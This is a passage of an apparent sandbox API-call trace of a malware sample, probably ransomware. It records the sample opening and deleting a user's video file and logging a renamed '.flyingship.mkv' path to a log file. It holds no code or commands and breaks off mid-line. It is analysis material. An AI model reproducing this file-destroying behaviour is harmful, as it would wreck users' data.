[0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.184] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.184] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0192.184] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\axsaypuzrscymoeip6.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0192.185] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.185] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0192.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.185] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.186] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.186] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0192.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.186] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.186] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv", lpFilePart=0x0) returned 0x43 [0192.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4feb80, ftCreationTime.dwHighDateTime=0x1d5daaa, ftLastAccessTime.dwLowDateTime=0xfe4da90, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0x17c0dbe0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xaee7, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="aXsAYPuZRSCYMOeip6.mkv", cAlternateFileName="AXSAYP~1.MKV")) returned 0x90af58 [0192.186] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\axsaypuzrscymoeip6.mkv")) returned 1 [0192.188] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4feb80, ftCreationTime.dwHighDateTime=0x1d5daaa, ftLastAccessTime.dwLowDateTime=0xfe4da90, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0x17c0dbe0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xaee7, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="aXsAYPuZRSCYMOeip6.mkv", cAlternateFileName="AXSAYP~1.MKV")) returned 0 [0192.188] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.191] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.192] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.192] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.192] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.192] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.193] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.193] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.193] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.193] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0192.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.194] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.194] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0192.194] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x337e, lpOverlapped=0x0) returned 1 [0192.194] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0192.194] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x337e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.194] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0192.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.flyingship.mkv\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0192.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x51) returned 0x8c4a48 [0192.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.flyingship.mkv\r\n", cchWideChar=81, lpMultiByteStr=0x8c4a48, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 81 [0192.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0192.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0192.195] WriteFile (in: hFile=0x158, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x50, lpOverlapped=0x0) returned 1 [0192.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.195] CloseHandle (hObject=0x158) returned 1 [0192.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0192.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0192.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.208] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0192.208] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.209] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0192.209] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.209] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0192.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0192.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.209] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0192.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0192.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0192.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0192.210] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 